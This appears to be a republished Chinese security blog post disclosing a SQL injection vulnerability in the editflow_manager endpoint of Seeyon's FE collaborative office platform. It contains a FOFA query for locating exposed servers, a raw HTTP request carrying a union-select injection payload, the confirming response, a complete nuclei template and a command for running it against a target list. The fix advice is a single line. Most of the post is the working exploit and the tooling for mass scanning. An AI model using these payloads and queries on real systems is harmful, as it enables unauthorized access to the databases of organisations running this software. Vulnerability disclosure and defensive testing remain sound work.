致远互联FE协作办公平台editflow_manager存在sql注入漏洞(附nuclei poc)

admin 2023年12月23日10:06:17评论48 views字数 1797阅读5分59秒阅读模式

使

01

漏洞名称

致远互联FE协作办公平台editflow_manager存在sql注入漏洞

02

漏洞影响

致远互联FE协作办公平台诸多版本都存在该漏洞

致远互联FE协作办公平台editflow_manager存在sql注入漏洞(附nuclei poc)

03

漏洞描述

致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块,旨在帮助企业实现高效的团队协作、信息共享和文档管理。致远互联FE协作办公平台editflow_manager存在sql注入漏洞,攻击者可以获得敏感信息

04

FOFA搜索语句
title="FE协作办公平台" || body="li_plugins_download"

致远互联FE协作办公平台editflow_manager存在sql注入漏洞(附nuclei poc)

05

漏洞复现

向靶场发送如下数据包计算111*222

POST /sysform/003/editflow_manager.js%70 HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeContent-Length: 41Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

响应内容如下

HTTP/1.1 200 OKConnection: closeContent-Length: 19Content-Type: text/html;charset=utf-8Date: Wed, 13 Dec 2023 01:54:05 GMTServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=KXALEDDIWK92000AA305DEE7FF4B5BCDD; Path=/X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5















24642

响应结果中包含24642证明存在漏洞

06

nuclei poc

poc文件内容如下

id: seeyon-FE-editflow_manager-sqli

info:  name: 致远互联FE协作办公平台editflow_manager存在sql注入漏洞  author: fgz  severity: high  description: 致远互联FE协作办公平台editflow_manager存在sql注入漏洞,攻击者可以获得敏感信息,也可能获取服务器控制权。  metadata:    fofa-query: title="FE协作办公平台" || body="li_plugins_download"requests:  - raw:      - |        POST /sysform/003/editflow_manager.js%70 HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Content-Type: application/x-www-form-urlencoded                option=2&GUID=-1'+union+select+111*222--+

    matchers-condition: and    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body,'24642')"

运行POC

nuclei.exe -t seeyon-FE-editflow_manager-sqli.yaml -l FE协作办公平台.txt

致远互联FE协作办公平台editflow_manager存在sql注入漏洞(附nuclei poc)

07

修复建议

升级到最新版本或者部署WAF。

原文始发于微信公众号(AI与网安):致远互联FE协作办公平台editflow_manager存在sql注入漏洞(附nuclei poc)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月23日10:06:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   致远互联FE协作办公平台editflow_manager存在sql注入漏洞(附nuclei poc)http://cn-sec.com/archives/2330972.html

发表评论

匿名网友 填写信息